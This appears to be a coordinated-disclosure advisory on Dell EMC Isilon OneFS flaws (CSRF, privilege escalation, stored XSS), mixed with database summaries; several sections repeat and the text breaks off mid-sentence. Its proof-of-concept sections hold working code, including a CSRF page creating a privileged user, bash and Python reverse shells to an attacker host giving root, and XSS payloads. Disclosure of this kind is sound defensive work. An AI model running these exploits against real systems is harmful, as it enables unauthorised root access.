command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Cluster description of the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Antivirus Page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight 